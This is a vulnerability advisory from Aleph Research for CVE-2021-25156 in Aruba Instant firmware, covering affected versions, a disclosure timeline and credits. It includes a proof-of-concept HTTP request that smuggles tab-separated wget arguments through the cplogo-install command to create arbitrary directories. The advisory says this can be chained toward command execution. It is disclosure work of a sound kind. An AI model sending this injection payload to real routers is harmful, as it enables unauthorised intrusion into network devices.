Authenticated Arbitrary Directory Create via Web UI (cplogo-install)

Aleph Research Advisory

Identifier

CVE-2021-25156

Severity

Moderate

Product

- Aruba Instant

Vulnerable Version

- Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below - Aruba Instant 6.5.x: 6.5.4.18 and below - Aruba Instant 8.3.x: 8.3.0.14 and below - Aruba Instant 8.5.x: 8.5.0.11 and below - Aruba Instant 8.6.x: 8.6.0.6 and below - Aruba Instant 8.7.x: 8.7.1.0 and below

Technical Details

An authenticated attacker can create a directory at arbitrary path. The issue is within the handler for the cplogo-install CLI command. The handler for the command will not filter %09(tab) characters from the param, which can cause parameter injection into wget call.

An attacker can chain this with other vulnerabilities to run arbitrary commands on the router.

POC:

POST /swarm.cgi HTTP/1.1
Host: IP:4343
.......
.......
Cookie: sid=XXXXXXXXXXXXXXXXXXXX; login=undefined; password=undefined; userType=admin
 
opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20"https:// IP:4343/backup.cfg%09--directory-prefix%09/tmp/oper_/%09#"'&refresh=false&sid=XXXXXXXXXXXXXXXXXXXX&nocache=0.23759201691110987&=&=

Timeline

22-Nov-20
: Reported
03-Feb-21
: CVE-2021-25156 assigned
09-Mar-21
: Patch
09-Mar-21
: Public disclosure

Credit

Gr33nh4t of Aleph Research, HCL Software
waveburst of Aleph Research, HCL Software